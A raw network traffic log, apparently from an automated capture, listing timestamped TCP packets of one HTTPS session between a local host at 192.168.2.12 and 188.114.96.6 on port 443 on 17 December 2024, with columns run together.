                                                                        Dec 17, 2024 08:38:29.219613075 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:29.219616890 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.219630957 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.219671965 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:29.219671965 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:29.226742029 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.226771116 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.226856947 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:29.226874113 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.226902008 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:29.226933956 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:29.233702898 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.233726978 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.233793974 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:29.233805895 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.233830929 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:29.233854055 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:29.239924908 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.239943981 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.240000010 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:29.240014076 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.240053892 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:29.240098000 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:29.247124910 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.247143984 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.247198105 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:29.247210026 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.247251987 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:29.247344017 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:29.253667116 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.253696918 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.253737926 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:29.253750086 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.253818035 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:29.260731936 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.260754108 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.260840893 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:29.260855913 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.260926962 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:29.265856028 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.265897989 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.265939951 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:29.265952110 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.266016006 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:29.410842896 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.410868883 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.410917044 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:29.410928011 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.411024094 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:29.416672945 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.416691065 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.416794062 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:29.416795015 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:29.416802883 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.423906088 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.423939943 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.423975945 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:29.423983097 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.424103022 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:29.430919886 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.430949926 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.431014061 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:29.431021929 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.431049109 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:29.437268972 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.437300920 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.437371016 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:29.437380075 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.437448025 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:29.438508987 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:29.444763899 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.444788933 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.444864988 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:29.444873095 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.450963974 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.450994015 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.451030016 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:29.451036930 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.451091051 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:29.458141088 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.458169937 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.458256006 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:29.458262920 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.458278894 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:29.567333937 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:29.602879047 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.602894068 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.602924109 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.602936983 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.602993965 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:29.603004932 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.603030920 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:29.603044987 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:29.609064102 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.609071970 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.609117031 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.609160900 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:29.609169960 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.609198093 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:29.609230995 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:29.616091967 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.616131067 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.616179943 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:29.616187096 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.616215944 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:29.616229057 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:29.623229980 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.623249054 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.623307943 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:29.623322010 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.623351097 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:29.623385906 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:29.629457951 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.629475117 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.629554987 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:29.629565001 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.629591942 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:29.629602909 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:29.637033939 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.637059927 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.637100935 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:29.637109041 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.637165070 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:29.643202066 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.643229961 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.643268108 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:29.643275023 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.643323898 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:29.650274992 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.650293112 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.650368929 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:29.650377989 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.650435925 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:29.794701099 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.794728041 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.794814110 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:29.794827938 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.794873953 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:29.794873953 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:29.801631927 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.801651955 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.801778078 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:29.801786900 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.801835060 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:29.808821917 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.808840990 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.808895111 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:29.808903933 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.808980942 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:29.815074921 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.815095901 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.815206051 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:29.815217972 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.815274000 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:29.822185993 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.822206020 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.822268963 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:29.822280884 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.822329044 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:29.828809977 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.828829050 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.828896999 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:29.828911066 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.828955889 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:29.835900068 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.835926056 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.835978985 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:29.835989952 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.836036921 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:29.842989922 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.843008995 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.843075991 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:29.843084097 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.843118906 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:29.987023115 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.987060070 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.987153053 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:29.987153053 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:29.987169981 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.987261057 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:29.994276047 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.994297981 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.994381905 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:29.994381905 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:29.994395971 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.994437933 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:29.995150089 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:29.995191097 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:30.002259016 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.002281904 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.002362967 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:30.002362967 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:30.002374887 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.005487919 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.005691051 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:30.005702972 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.012659073 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.012689114 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.012762070 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:30.012762070 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:30.012773037 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.019401073 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.019424915 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.019488096 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:30.019506931 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.019566059 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:30.023222923 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.023333073 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:30.023346901 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.029597998 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.029620886 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.029704094 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:30.029716015 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.029865980 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:30.036436081 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.036463976 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.036531925 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:30.036531925 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:30.036546946 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.038702965 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.038749933 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:30.038767099 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.038830042 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:30.182682037 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.182710886 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.183186054 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:30.183206081 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.183547974 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:30.187727928 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.187787056 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.187923908 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:30.187923908 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:30.187937021 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.194891930 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.194911957 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.195611000 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:30.195625067 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.197958946 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.199007034 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:30.199027061 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.205220938 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.205240011 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.207334042 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:30.207353115 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.211741924 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.211765051 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.211946964 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:30.211946964 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:30.211977959 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.213639975 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.215070963 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:30.215086937 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.215414047 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:30.215744972 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.216677904 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:30.221999884 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.222017050 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.222522020 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:30.222534895 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.229167938 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.229208946 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.229716063 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:30.229716063 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:30.229732037 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.370949984 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:30.373413086 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.373426914 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.373445988 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.373454094 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.373492002 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.373502970 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.373519897 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:30.373625040 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:30.379617929 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.379631996 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.379956007 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:30.379956007 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:30.379983902 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.380002022 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.380155087 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.380206108 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:30.380464077 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:30.386815071 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.386843920 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.387345076 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:30.387383938 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.387620926 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:30.389950037 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.390379906 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:30.390424967 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.397046089 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.397070885 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.397480011 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:30.397505999 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.403604031 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.403623104 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.403934956 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:30.403959036 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.405611038 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.406083107 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:30.406100035 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.406310081 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:30.407552004 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.407706022 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:30.413815975 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.413856030 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.414057016 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:30.414086103 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.417819023 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.417992115 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:30.418001890 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.424920082 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.424937963 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.425324917 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:30.425342083 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.569117069 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.569139957 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.569329023 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:30.569329023 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:30.569348097 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.571049929 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.571115971 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:30.571137905 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.571595907 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:30.572154999 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.572563887 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:30.579209089 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.579217911 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.579258919 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.579298973 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:30.579479933 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:30.579479933 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:30.579498053 CET44349716188.114.96.6192.168.2.12
